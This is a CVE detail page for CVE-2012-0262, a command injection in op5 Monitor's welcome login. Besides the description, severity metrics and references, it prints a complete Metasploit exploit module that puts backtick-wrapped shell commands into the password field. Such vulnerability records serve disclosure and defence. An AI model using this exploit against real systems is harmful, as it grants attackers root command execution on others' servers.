CVE-2012-0262 : Detail

CVE-2012-0262

Code Injection
A03-Injection
88.11%V3
Network
2013-12-31
19h00 +00:00
2014-01-29
16h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

op5config/welcome in system-op5config before 2.0.3 in op5 Monitor and op5 Appliance before 5.5.3 allows remote attackers to execute arbitrary commands via shell metacharacters in the password parameter.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 41687

Publication date : 2015-01-04 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'OP5 welcome Remote Command Execution', 'Description' => %q{ This module exploits an arbitrary root command execution vulnerability in OP5 Monitor welcome. Ekelow AB has confirmed that OP5 Monitor versions 5.3.5, 5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable. }, 'Author' => [ 'Peter Osterberg <j[at]vel.nu>' ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2012-0262'], ['OSVDB', '78065'], ['URL', 'http://secunia.com/advisories/47417/'], ], 'Privileged' => true, 'Payload' => { 'DisableNops' => true, 'Space' => 1024, 'BadChars' => '`\\|', 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'perl ruby python', } }, 'Platform' => %w{ linux unix }, 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Jan 05 2012', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(443), OptString.new('URI', [true, "The full URI path to /op5config/welcome", "/op5config/welcome"]), ], self.class) end def check vprint_status("Attempting to detect if the OP5 Monitor is vulnerable...") vprint_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}") # Try running/timing 'ping localhost' to determine is system is vulnerable start = Time.now data = 'do=do=Login&password=`ping -c 10 127.0.0.1`'; res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), 'method' => 'POST', 'proto' => 'HTTPS', 'data' => data, 'headers' => { 'Connection' => 'close', } }, 25) elapsed = Time.now - start if elapsed >= 5 return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}") data = 'do=do=Login&password=`' + payload.encoded + '`'; res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), 'method' => 'POST', 'proto' => 'HTTPS', 'data' => data, 'headers' => { 'Connection' => 'close', } }, 10) if(not res) if session_created? print_status("Session created, enjoy!") else print_error("No response from the server") end return end end end

Products Mentioned

Configuraton 0

Op5>>Monitor >> Version To (including) 5.5.1

Op5>>Monitor >> Version 5.3.5

Op5>>Monitor >> Version 5.4.0

Op5>>Monitor >> Version 5.4.2

Op5>>Monitor >> Version 5.5.0

Op5>>System-op5config >> Version To (including) 2.0.2

References

https://bugs.op5.com/view.php?id=5094
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/47417
Tags : third-party-advisory, x_refsource_SECUNIA
http://seclists.org/fulldisclosure/2012/Jan/62
Tags : mailing-list, x_refsource_FULLDISC
http://www.osvdb.org/78065
Tags : vdb-entry, x_refsource_OSVDB